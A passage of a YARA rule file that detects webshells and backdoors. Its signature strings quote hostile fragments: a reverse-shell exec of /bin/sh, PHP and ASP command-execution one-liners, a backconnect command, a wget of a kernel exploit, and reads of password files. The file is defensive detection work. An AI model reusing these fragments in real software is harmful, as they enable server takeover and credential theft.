condition: 1 of them } rule Php_Webshell_pws_php_php { strings: $s0 = "<div align=\"left\"><font size=\"1\">Input command :</font></div>" fullword $s1 = "<input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br>" fullword $s4 = "<input type=\"text\" name=\"dir\" size=\"30\" value=\"<? 
passthru(\"pwd\"); ?>" condition: 2 of them } rule Php_Webshell_PHP_Shell_php_php { strings: $s0 = "echo \"</form><form action=\\\"$SFileName?$urlAdd\\\" method=\\\"post\\\"><input" $s1 = "echo \"<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\"><input type=" condition: all of them } rule Php_Webshell_Ayyildiz_Tim___AYT__Shell_v_2_1_Biz_html { strings: $s0 = "Ayyildiz" $s1 = "TouCh By iJOo" $s2 = "First we check if there has been asked for a working directory" $s3 = "http://ayyildiz.org/images/whosonline2.gif" condition: 2 of them } rule Asp_Webshell_EFSO_2_asp { strings: $s0 = "Ejder was HERE" $s1 = "*~PU*&BP[_)f!8c2F*@#@&~,P~P,~P&q~8BPmS~9~~lB~X`V,_,F&*~,jcW~~[_c3TRFFzq@#@&PP,~~" condition: 2 of them } rule Php_Webshell_lamashell_php { strings: $s0 = "lama's'hell" fullword $s1 = "if($_POST['king'] == \"\") {" $s2 = "if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir.\"/\".$_FILES['f" condition: 1 of them } rule Php_Webshell_Ajax_PHP_Command_Shell_php { strings: $s1 = "newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>" $s2 = "Empty Command..type \\\"shellhelp\\\" for some ehh...help" $s3 = "newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enct" condition: 1 of them } rule Jsp_Webshell_JspWebshell_1_2_jsp { strings: $s0 = "JspWebshell" $s1 = "CreateAndDeleteFolder is error:" $s2 = "<td width=\"70%\" height=\"22\"> <%=env.queryHashtable(\"java.c" $s3 = "String _password =\"111\";" condition: 2 of them } rule Php_Webshell_Sincap_php_php { strings: $s0 = "$baglan=fopen(\"/tmp/$ekinci\",'r');" $s2 = "$tampon4=$tampon3-1" $s3 = "@aventgrup.net" condition: 2 of them } rule Php_Webshell_Test_php_php { strings: $s0 = "$yazi = \"test\" . 
\"\\r\\n\";" fullword $s2 = "fwrite ($fp, \"$yazi\");" fullword $s3 = "$entry_line=\"HACKed by EntriKa\";" fullword condition: 1 of them } rule Php_Webshell_Phyton_Shell_py { strings: $s1 = "sh_out=os.popen(SHELL+\" \"+cmd).readlines()" fullword $s2 = "# d00r.py 0.3a (reverse|bind)-shell in python by fQ" fullword $s3 = "print \"error; help: head -n 16 d00r.py\"" fullword $s4 = "print \"PW:\",PW,\"PORT:\",PORT,\"HOST:\",HOST" fullword condition: 1 of them } rule Php_Webshell_mysql_tool_php_php { strings: $s0 = "$error_text = '<strong>Failed selecting database \"'.$this->db['" $s1 = "$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERV" $s4 = "<div align=\"center\">The backup process has now started<br " condition: 1 of them } rule Asp_Webshell_Zehir_4_asp { strings: $s2 = "</a><a href='\"&dosyapath&\"?status=10&dPath=\"&f1.path&\"&path=\"&path&\"&Time=" $s4 = "<input type=submit value=\"Test Et!\" onclick=\"" condition: 1 of them } rule Php_Webshell_sh_php_php { strings: $s1 = "$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/e" $s2 = "Show <input type=text size=5 value=\".((isset($_POST['br_st']))?$_POST['br_st']:" condition: 1 of them } rule Php_Webshell_phpbackdoor15_php { strings: $s1 = "echo \"fichier telecharge dans \".good_link(\"./\".$_FILES[\"fic\"][\"na" $s2 = "if(move_uploaded_file($_FILES[\"fic\"][\"tmp_name\"],good_link(\"./\".$_FI" $s3 = "echo \"Cliquez sur un nom de fichier pour lancer son telechargement. 
Cliquez s" condition: 1 of them } rule Php_Webshell_phpjackal_php { strings: $s3 = "$dl=$_REQUEST['downloaD'];" $s4 = "else shelL(\"perl.exe $name $port\");" condition: 1 of them } rule Php_Webshell_sql_php_php { strings: $s1 = "fputs ($fp, \"# RST MySQL tools\\r\\n# Home page: http://rst.void.ru\\r\\n#" $s2 = "http://rst.void.ru" $s3 = "print \"<a href=\\\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&" condition: 1 of them } rule Php_Webshell_cgi_python_py { strings: $s0 = "a CGI by Fuzzyman" $s1 = "\"\"\"+fontline +\"Version : \" + versionstring + \"\"\", Running on : \"\"\" + " $s2 = "values = map(lambda x: x.value, theform[field]) # allows for" condition: 1 of them } rule Php_Webshell_ru24_post_sh_php_php { strings: $s1 = "<title>Ru24PostWebShell - \".$_POST['cmd'].\"" fullword $s3 = "if ((!$_POST['cmd']) || ($_POST['cmd']==\"\")) { $_POST['cmd']=\"id;pwd;uname -a" $s4 = "Writed by DreAmeRz" fullword condition: 1 of them } rule Php_Webshell_DTool_Pro_php { strings: $s0 = "r3v3ng4ns\\nDigite" $s1 = "if(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: It seems that the permissi" $s3 = "if (empty($cmd) and $ch_msg==\"\") echo (\"Comandos Exclusivos do DTool Pro\\n" condition: 1 of them } rule Php_Webshell_telnetd_pl { strings: $s0 = "0ldW0lf" fullword $s1 = "However you are lucky :P" $s2 = "I'm FuCKeD" $s3 = "ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);#" $s4 = "atrix@irc.brasnet.org" condition: 1 of them } rule Php_Webshell_php_include_w_shell_php { strings: $s0 = "$dataout .= \"
    \" : \"[admin\\@$ServerName $C" condition: 1 of them } rule Php_Webshell_ironshell_php { strings: $s0 = "www.ironwarez.info" $s1 = "$cookiename = \"wieeeee\";" $s2 = "~ Shell I" $s3 = "www.rootshell-team.info" $s4 = "setcookie($cookiename, $_POST['pass'], time()+3600);" condition: 1 of them } rule Php_Webshell_backdoorfr_php { strings: $s1 = "www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tan" $s2 = "print(\"
    Provenance du mail : /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");" condition: 1 of them } rule Asp_Webshell_Ajan_asp { strings: $s1 = "c:\\downloaded.zip" $s2 = "Set entrika = entrika.CreateTextFile(\"c:\\net.vbs\", True)" fullword $s3 = "http://www35.websamba.com/cybervurgun/" condition: 1 of them } rule Php_Webshell_PHANTASMA_php { strings: $s0 = ">[*] Safemode Mode Run" $s1 = "$file1 - $file2 -
    $file
    " $s2 = "[*] Spawning Shell" $s3 = "Cha0s" condition: 2 of them } rule Php_Webshell_MySQL_Web_Interface_Version_0_8_php { strings: $s0 = "SooMin Kim" $s1 = "http://popeye.snu.ac.kr/~smkim/mysql" $s2 = "href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename" $s3 = "
    Type M  D unsignedzerofi" condition: 2 of them } rule Php_Webshell_simple_cmd_html { strings: $s1 = "G-Security Webshell" fullword $s2 = "\" " fullword $s3 = "" fullword $s4 = "" fullword condition: all of them } rule Php_Webshell_1_c2007_php_php_c100_php { strings: $s0 = "echo \"Changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\"" $s3 = "echo \" Done!
    Total time (secs.): \".$ft" $s3 = "$fqb_log .= \"\\r\\n------------------------------------------\\r\\nDone!\\r" condition: 1 of them } rule Php_Webshell_r577_php_php_SnIpEr_SA_Shell_php_r57_php_php_r57_Shell_php_php_spy_php_php_s_php_php { strings: $s2 = "'eng_text71'=>\"Second commands param is:\\r\\n- for CHOWN - name of new owner o" $s4 = "if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult" condition: 1 of them } rule Php_Webshell_c99shell_v1_0_php_php_c99php_SsEs_php_php_ctt_sh_php_php { strings: $s0 = "\"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze\"" $s2 = "\"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm\"" $s4 = "\"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo\"" condition: 2 of them } rule Php_Webshell_r577_php_php_spy_php_php_s_php_php { strings: $s2 = "echo $te.\"
    XXXX\" title=\"<%=SubFolder.Name%>\"> \" title=\"<%=File.Name%>\"> \" align=\"right\"><%=Attributes(SubFolder.Attributes)%>\">" condition: all of them } rule Php_Webshell_byloader { strings: $s0 = "SYSTEM\\CurrentControlSet\\Services\\NtfsChk" $s1 = "Failure ... Access is Denied !" $s2 = "NTFS Disk Driver Checking Service" $s3 = "Dumping Description to Registry..." $s4 = "Opening Service .... Failure !" condition: all of them } rule Php_Webshell_shelltools_g0t_root_Fport { strings: $s4 = "Copyright 2000 by Foundstone, Inc." $s5 = "You must have administrator privileges to run fport - exiting..." condition: all of them } rule Php_Webshell_BackDooR__fr_ { strings: $s3 = "print(\"

    Exploit include " condition: all of them } rule Php_Webshell_FSO_s_ntdaddy { strings: $s1 = "\"> &X\\\";open STDERR,\\\">&X\\\";exec(\\\"/bin/sh -i\\\");" condition: all of them } rule Php_Webshell_HYTop_DevPack_upload { strings: $s0 = "" condition: all of them } rule Php_Webshell_PasswordReminder { strings: $s3 = "The encoded password is found at 0x%8.8lx and has a length of %d." condition: all of them } rule Php_Webshell_Pack_InjectT { strings: $s3 = "ail To Open Registry" $s4 = "32fDssignim" $s5 = "vide Internet S" $s6 = "d]Software\\M" $s7 = "TInject.Dll" condition: all of them } rule Php_Webshell_FSO_s_RemExp_2 { strings: $s2 = " Then Response.Write \"" $s3 = "" condition: all of them } rule Php_Webshell_FSO_s_c99 { strings: $s2 = "\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htacce" condition: all of them } rule Php_Webshell_rknt_zip_Folder_RkNT { strings: $s0 = "PathStripPathA" $s1 = "`cLGet!Addr%" $s2 = "$Info: This file is packed with the UPX executable packer http://upx.tsx.org $" $s3 = "oQToOemBuff* <=" $s4 = "ionCdunAsw[Us'" $s6 = "CreateProcessW: %S" $s7 = "ImageDirectoryEntryToData" condition: all of them } rule Php_Webshell_dbgntboot { strings: $s2 = "now DOS is working at mode %d,faketype %d,against %s,has worked %d minutes,by sp" $s3 = "sth junk the M$ Wind0wZ retur" condition: all of them } rule Php_Webshell_PHP_shell { strings: $s0 = "AR8iROET6mMnrqTpC6W1Kp/DsTgxNby9H1xhiswfwgoAtED0y6wEXTihoAtICkIX6L1+vTUYWuWz" $s11 = "1HLp1qnlCyl5gko8rDlWHqf8/JoPKvGwEm9Q4nVKvEh0b0PKle3zeFiJNyjxOiVepMSpflJkPv5s" condition: all of them } rule Php_Webshell_hxdef100 { strings: $s0 = "RtlAnsiStringToUnicodeString" $s8 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\" $s9 = "\\\\.\\mailslot\\hxdef-rk100sABCDEFGH" condition: all of them } rule Php_Webshell_rdrbs100 { strings: $s3 = "Server address must be IP in A.B.C.D format." $s4 = " mapped ports in the list. 
Currently " condition: all of them } rule Php_Webshell_Mithril_Mithril { strings: $s0 = "OpenProcess error!" $s1 = "WriteProcessMemory error!" $s4 = "GetProcAddress error!" $s5 = "HHt`HHt\\" $s6 = "Cmaudi0" $s7 = "CreateRemoteThread error!" $s8 = "Kernel32" $s9 = "VirtualAllocEx error!" condition: all of them } rule Php_Webshell_hxdef100_2 { strings: $s0 = "\\\\.\\mailslot\\hxdef-rkc000" $s2 = "Shared Components\\On Access Scanner\\BehaviourBlo" $s6 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\" condition: all of them } rule Php_Webshell_Release_dllTest { strings: $s0 = ";;;Y;`;d;h;l;p;t;x;|;" $s1 = "0 0&00060K0R0X0f0l0q0w0" $s2 = ": :$:(:,:0:4:8:D:`=d=" $s3 = "4@5P5T5\\5T7\\7d7l7t7|7" $s4 = "1,121>1C1K1Q1X1^1e1k1s1y1" $s5 = "9 9$9(9,9P9X9\\9`9d9h9l9p9t9x9|9" $s6 = "0)0O0\\0a0o0\"1E1P1q1" $s7 = "<.\".ws(2).\"HDD Free : \".view_size($free).\" HDD Total : \".view_" condition: all of them } rule Php_Webshell_Mithril_v1_45_dllTest { strings: $s3 = "syspath" $s4 = "\\Mithril" $s5 = "--list the services in the computer" condition: all of them } rule Php_Webshell_dbgiis6cli { strings: $s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" $s5 = "###command:(NO more than 100 bytes!)" condition: all of them } rule Php_Webshell_remview_2003_04_22 { strings: $s1 = "\"\".mm(\"Eval PHP code\").\" (\".mm(\"don't type\").\" \\\"<?\\\"" condition: all of them } rule Php_Webshell_FSO_s_test { strings: $s0 = "$yazi = \"test\" . 
\"\\r\\n\";" $s2 = "fwrite ($fp, \"$yazi\");" condition: all of them } rule Php_Webshell_Debug_cress { strings: $s0 = "\\Mithril " $s4 = "Mithril.exe" condition: all of them } rule Php_Webshell_webshell { strings: $s0 = "RhViRYOzz" $s1 = "d\\O!jWW" $s2 = "bc!jWW" $s3 = "0W[&{l" $s4 = "[INhQ@\\" condition: all of them } rule Php_Webshell_FSO_s_EFSO_2 { strings: $s0 = ";!+/DRknD7+.\\mDrC(V+kcJznndm\\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl\"dKVcJ\\CslU,),@!0KxD~mKV" $s4 = "\\co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX\"b~/fAs!u&9|J\\grKp\"j" condition: all of them } rule Php_Webshell_thelast_index3 { strings: $s5 = "$err = \"Your Name Not Entered!Sorry, \\\"Your Name\\\" field is r" condition: all of them } rule Php_Webshell_adjustcr { strings: $s0 = "$Info: This file is packed with the UPX executable packer $" $s2 = "$License: NRV for UPX is distributed under special license $" $s6 = "AdjustCR Carr" $s7 = "ION\\System\\FloatingPo" condition: all of them } rule Php_Webshell_FeliksPack3___PHP_Shells_xIShell { strings: $s3 = "if (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"

    \")" condition: all of them } rule Php_Webshell_EditServer_2 { strings: $s0 = "@HOTMAIL.COM" $s1 = "Press Any Ke" $s3 = "glish MenuZ" condition: all of them } rule Php_Webshell_by064cli { strings: $s7 = "packet dropped,redirecting" $s9 = "input the password(the default one is 'by')" condition: all of them } rule Php_Webshell_Mithril_dllTest { strings: $s0 = "please enter the password:" $s3 = "\\dllTest.pdb" condition: all of them } rule Php_Webshell_peek_a_boo { strings: $s0 = "__vbaHresultCheckObj" $s1 = "\\VB\\VB5.OLB" $s2 = "capGetDriverDescriptionA" $s3 = "__vbaExceptHandler" $s4 = "EVENT_SINK_Release" $s8 = "__vbaErrorOverflow" condition: all of them } rule Php_Webshell_fmlibraryv3 { strings: $s3 = "ExeNewRs.CommandText = \"UPDATE \" & tablename & \" SET \" & ExeNewRsValues & \" WHER" condition: all of them } rule Php_Webshell_Debug_dllTest_2 { strings: $s4 = "\\Debug\\dllTest.pdb" $s5 = "--list the services in the computer" condition: all of them } rule Php_Webshell_connector { strings: $s2 = "If ( AttackID = BROADCAST_ATTACK )" $s4 = "Add UNIQUE ID for victims / zombies" condition: all of them } rule Php_Webshell_shelltools_g0t_root_HideRun { strings: $s0 = "Usage -- hiderun [AppName]" $s7 = "PVAX SW, Alexey A. Popoff, Moscow, 1997." condition: all of them } rule Php_Webshell_PHP_Shell_v1_7 { strings: $s8 = "[ADDITINAL TITTLE]-phpShell by:[YOURNAME]" condition: all of them } rule Php_Webshell_xssshell_save { strings: $s4 = "RawCommand = Command & COMMAND_SEPERATOR & Param & COMMAND_SEPERATOR & AttackID" $s5 = "VictimID = fm_NStr(Victims(i))" condition: all of them } rule Php_Webshell_screencap { strings: $s0 = "GetDIBColorTable" $s1 = "Screen.bmp" $s2 = "CreateDCA" condition: all of them } rule Php_Webshell_FSO_s_phpinj_2 { strings: $s9 = "<? 
system(\\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO" condition: all of them } rule Php_Webshell_ZXshell2_0_rar_Folder_zxrecv { strings: $s0 = "RyFlushBuff" $s1 = "teToWideChar^FiYP" $s2 = "mdesc+8F D" $s3 = "\\von76std" $s4 = "5pur+virtul" $s5 = "- Kablto io" $s6 = "ac#f{lowi8a" condition: all of them } rule Php_Webshell_FSO_s_ajan { strings: $s4 = "entrika.write \"BinaryStream.SaveToFile" condition: all of them } rule Php_Webshell_c99shell { strings: $s0 = "<br />Input URL: <input name=\\\"uploadurl\\\" type=\\\"text\\\"&" condition: all of them } rule Php_Webshell_phpspy_2005_full { strings: $s7 = "echo \" <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco" condition: all of them } rule Php_Webshell_FSO_s_zehir4_2 { strings: $s4 = "\"Program Files\\Serv-u\\Serv" condition: all of them } rule Php_Webshell_FSO_s_indexer_2 { strings: $s5 = "<td>Nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>" condition: all of them } rule Php_Webshell_HYTop_DevPack_2005 { strings: $s7 = "theHref=encodeForUrl(mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\")" $s8 = "scrollbar-darkshadow-color:#9C9CD3;" $s9 = "scrollbar-face-color:#E4E4F3;" condition: all of them } rule Php_Webshell_root_040_zip_Folder_deploy { strings: $s5 = "halon synscan 127.0.0.1 1-65536" $s8 = "Obviously you replace the ip address with that of the target." condition: all of them } rule Php_Webshell_by063cli { strings: $s2 = "#popmsghello,are you all right?" $s4 = "connect failed,check your network and remote ip." 
condition: all of them } rule Asp_Webshell_icyfox007v1_10_rar_Folder_asp { strings: $s0 = "<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>" condition: all of them } rule Php_Webshell_FSO_s_EFSO_2_2 { strings: $s0 = ";!+/DRknD7+.\\mDrC(V+kcJznndm\\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl\"dKVcJ\\CslU,),@!0KxD~mKV" $s4 = "\\co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX\"b~/fAs!u&9|J\\grKp\"j" condition: all of them } rule Php_Webshell_byshell063_ntboot_2 { strings: $s6 = "OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:)" condition: all of them } rule Php_Webshell_u_uay { strings: $s1 = "exec \"c:\\WINDOWS\\System32\\freecell.exe" $s9 = "SYSTEM\\CurrentControlSet\\Services\\uay.sys\\Security" condition: 1 of them } rule Php_Webshell_bin_wuaus { strings: $s1 = "9(90989@9V9^9f9n9v9" $s2 = ":(:,:0:4:8:C:H:N:T:Y:_:e:o:y:" $s3 = ";(=@=G=O=T=X=\\=" $s4 = "TCP Send Error!!" $s5 = "1\"1;1X1^1e1m1w1~1" $s8 = "=$=)=/=<=Y=_=j=p=z=" condition: all of them } rule Php_Webshell_pwreveal { strings: $s0 = "*<Blank - no es" $s3 = "JDiamondCS " $s8 = "sword set> [Leith=0 bytes]" $s9 = "ION\\System\\Floating-" condition: all of them } rule Php_Webshell_shelltools_g0t_root_xwhois { strings: $s1 = "rting! 
" $s2 = "aTypCog(" $s5 = "Diamond" $s6 = "r)r=rQreryr" condition: all of them } rule Php_Webshell_vanquish_2 { strings: $s2 = "Vanquish - DLL injection failed:" condition: all of them } rule Php_Webshell_down_rar_Folder_down { strings: $s0 = "response.write \"<font color=blue size=2>NetBios Name: \\\\\" & Snet.ComputerName &" condition: all of them } rule Php_Webshell_cmdShell { strings: $s1 = "if cmdPath=\"wscriptShell\" then" condition: all of them } rule Php_Webshell_ZXshell2_0_rar_Folder_nc { strings: $s0 = "WSOCK32.dll" $s1 = "?bSUNKNOWNV" $s7 = "p@gram Jm6h)" $s8 = "ser32.dllCONFP@" condition: all of them } rule Php_Webshell_portlessinst { strings: $s2 = "Fail To Open Registry" $s3 = "f<-WLEggDr\"" $s6 = "oMemoryCreateP" condition: all of them } rule Php_Webshell_SetupBDoor { strings: $s1 = "\\BDoor\\SetupBDoor" condition: all of them } rule Php_Webshell_phpshell_3 { strings: $s3 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p>" $s5 = " echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>\\n\";" condition: all of them } rule Php_Webshell_BIN_Server { strings: $s0 = "configserver" $s1 = "GetLogicalDrives" $s2 = "WinExec" $s4 = "fxftest" $s5 = "upfileok" $s7 = "upfileer" condition: all of them } rule Php_Webshell_HYTop2006_rar_Folder_2006 { strings: $s6 = "strBackDoor = strBackDoor " condition: all of them } rule Php_Webshell_r57shell_3 { strings: $s1 = "<b>\".$_POST['cmd']" condition: all of them } rule Php_Webshell_HDConfig { strings: $s0 = "An encryption key is derived from the password hash. " $s3 = "A hash object has been created. " $s4 = "Error during CryptCreateHash!" $s5 = "A new key container has been created." $s6 = "The password has been added to the hash. 
" condition: all of them } rule Php_Webshell_FSO_s_ajan_2 { strings: $s2 = "\"Set WshShell = CreateObject(\"\"WScript.Shell\"\")" $s3 = "/file.zip" condition: all of them } rule Php_Webshell_Webshell_and_Exploit_CN_APT_HK { strings: $a0 = "<script language=javascript src=http://java-se.com/o.js</script>" fullword $s0 = "<span style=\"font:11px Verdana;\">Password: </span><input name=\"password\" type=\"password\" size=\"20\">" $s1 = "<input type=\"hidden\" name=\"doing\" value=\"login\">" condition: $a0 or ( all of ($s*) ) } rule Jsp_Webshell_JSP_Browser_APT_webshell { strings: $a1a = "private static final String[] COMMAND_INTERPRETER = {\"" ascii $a1b = "cmd\", \"/C\"}; // Dos,Windows" ascii $a2 = "Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));" ascii $a3 = "ret.append(\"!!!! Process has timed out, destroyed !!!!!\");" ascii condition: all of them } rule Jsp_Webshell_JSP_jfigueiredo_APT_webshell { strings: $a1 = "String fhidden = new String(Base64.encodeBase64(path.getBytes()));" ascii $a2 = "<form id=\"upload\" name=\"upload\" action=\"ServFMUpload\" method=\"POST\" enctype=\"multipart/form-data\">" ascii condition: all of them } rule Jsp_Webshell_JSP_jfigueiredo_APT_webshell_2 { strings: $a1 = "<div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>" ascii $a2 = "$(\"#dialog\").dialog(\"destroy\");" ascii $s1 = "<form id=\"form\" action=\"ServFMUpload\" method=\"post\" enctype=\"multipart/form-data\">" ascii $s2 = "<input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"L3BkZi8=\" />" ascii condition: all of ($a*) or all of ($s*) } rule Php_Webshell_Webshell_Insomnia { strings: $s0 = "Response.Write(\"- Failed to create named pipe:\");" fullword ascii $s1 = "Response.Output.Write(\"+ Sending {0}<br>\", command);" fullword ascii $s2 = "String command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1" ascii $s3 = "Response.Write(\"- Error Getting User Info<br>\");" fullword ascii $s4 = "string lpCommandLine, ref 
SECURITY_ATTRIBUTES lpProcessAttributes," fullword ascii $s5 = "[DllImport(\"Advapi32.dll\", SetLastError = true)]" fullword ascii $s9 = "username = DumpAccountSid(tokUser.User.Sid);" fullword ascii $s14 = "//Response.Output.Write(\"Opened process PID: {0} : {1}<br>\", p" ascii condition: 3 of them } rule Php_Webshell_HawkEye_PHP_Panel { strings: $s0 = "$fname = $_GET['fname'];" ascii fullword $s1 = "$data = $_GET['data'];" ascii fullword $s2 = "unlink($fname);" ascii fullword $s3 = "echo \"Success\";" fullword ascii condition: all of ($s*) and filesize < 600 } rule Php_Webshell_SoakSoak_Infected_Wordpress { strings: $s0 = "wp_enqueue_script(\"swfobject\");" ascii fullword $s1 = "function FuncQueueObject()" ascii fullword $s2 = "add_action(\"wp_enqueue_scripts\", 'FuncQueueObject');" ascii fullword condition: all of ($s*) } rule Php_Webshell_Pastebin_Webshell { strings: $s0 = "file_get_contents(\"http://pastebin.com" ascii $s1 = "xcurl('http://pastebin.com/download.php" ascii $s2 = "xcurl('http://pastebin.com/raw.php" ascii $x0 = "if($content){unlink('evex.php');" ascii $x1 = "$fh2 = fopen(\"evex.php\", 'a');" ascii $y0 = "file_put_contents($pth" ascii $y1 = "echo \"<login_ok>" ascii $y2 = "str_replace('* @package Wordpress',$temp" ascii condition: 1 of ($s*) or all of ($x*) or all of ($y*) } rule Asp_Webshell_ASPXspy2 { strings: $s0 = "string iVDT=\"-SETUSERSETUP\\r\\n-IP=0.0.0.0\\r\\n-PortNo=52521\\r\\n-User=bin" ascii $s1 = "SQLExec : <asp:DropDownList runat=\"server\" ID=\"FGEy\" AutoPostBack=\"True\" O" ascii $s3 = "Process[] p=Process.GetProcesses();" fullword ascii $s4 = "Response.Cookies.Add(new HttpCookie(vbhLn,Password));" fullword ascii $s5 = "[DllImport(\"kernel32.dll\",EntryPoint=\"GetDriveTypeA\")]" fullword ascii $s6 = "<p>ConnString : <asp:TextBox id=\"MasR\" style=\"width:70%;margin:0 8px;\" CssCl" ascii $s7 = "ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();" fullword ascii $s8 = "Copyright © 2009 Bin -- <a 
href=\"http://www.rootkit.net.cn\" target=\"_bla" ascii $s10 = "Response.AddHeader(\"Content-Disposition\",\"attachment;filename=\"+HttpUtility." ascii $s11 = "nxeDR.Command+=new CommandEventHandler(this.iVk);" fullword ascii $s12 = "<%@ import Namespace=\"System.ServiceProcess\"%>" fullword ascii $s13 = "foreach(string innerSubKey in sk.GetSubKeyNames())" fullword ascii $s17 = "Response.Redirect(\"http://www.rootkit.net.cn\");" fullword ascii $s20 = "else if(Reg_Path.StartsWith(\"HKEY_USERS\"))" fullword ascii condition: 6 of them } rule Php_Webshell_Webshell_27_9_c66_c99 { strings: $s4 = "if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}" fullword ascii $s6 = "@extract($_REQUEST[\"c99shcook\"]);" fullword ascii $s7 = "if (!function_exists(\"c99_buff_prepare\"))" fullword ascii condition: filesize < 685KB and 1 of them } rule Php_Webshell_Webshell_acid_AntiSecShell_3 { strings: $s0 = "echo \"<option value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">Delete</option>\";" fullword ascii $s1 = "if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}" fullword ascii condition: filesize < 900KB and all of them } rule Php_Webshell_Webshell_c99_4 { strings: $s1 = "displaysecinfo(\"List of Attributes\",myshellexec(\"lsattr -a\"));" fullword ascii $s2 = "displaysecinfo(\"RAM\",myshellexec(\"free -m\"));" fullword ascii $s3 = "displaysecinfo(\"Where is perl?\",myshellexec(\"whereis perl\"));" fullword ascii $s4 = "$ret = myshellexec($handler);" fullword ascii $s5 = "if (posix_kill($pid,$sig)) {echo \"OK.\";}" fullword ascii condition: filesize < 900KB and 1 of them } rule Php_Webshell_Webshell_r57shell_2 { strings: $s1 = "$connection = @ftp_connect($ftp_server,$ftp_port,10);" fullword ascii $s2 = "echo $lang[$language.'_text98'].$suc.\"\\r\\n\";" fullword ascii condition: filesize < 900KB and all of them } rule Php_Webshell_Webshell_27_9_acid_c99_locus7s { strings: $s0 = "$blah = ex($p2.\" /tmp/back 
\".$_POST['backconnectip'].\" \".$_POST['backconnectport'].\" &\");" fullword ascii $s1 = "$_POST['backcconnmsge']=\"</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>\";" fullword ascii condition: filesize < 1711KB and 1 of them } rule Php_Webshell_Webshell_Backdoor_PHP_Agent_r57_mod_bizzz_shell_r57 { strings: $s1 = "$_POST['cmd'] = which('" ascii $s2 = "$blah = ex(" fullword ascii condition: filesize < 600KB and all of them } rule Php_Webshell_Webshell_c100 { strings: $s0 = "<OPTION VALUE=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">Kernel attack (Krad.c) PT1 (If wget installed)" fullword ascii $s1 = "<center>Kernel Info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">" fullword ascii $s3 = "cut -d: -f1,2,3 /etc/passwd | grep ::" ascii $s4 = "which wget curl w3m lynx" ascii $s6 = "netstat -atup | grep IST" ascii condition: filesize < 685KB and 2 of them } rule Php_Webshell_Webshell_AcidPoison { strings: $s1 = "elseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }" fullword ascii condition: filesize < 550KB and all of them } rule Php_Webshell_Webshell_acid_FaTaLisTiCz_Fx_fx_p0isoN_sh3ll_x0rg_byp4ss_256 { strings: $s0 = "<form method=\"POST\"><input type=hidden name=act value=\"ls\">" fullword ascii $s2 = "foreach($quicklaunch2 as $item) {" fullword ascii condition: filesize < 882KB and all of them } rule Php_Webshell_Webshell_Ayyildiz { strings: $s0 = "echo \"<option value=\\\"\". 
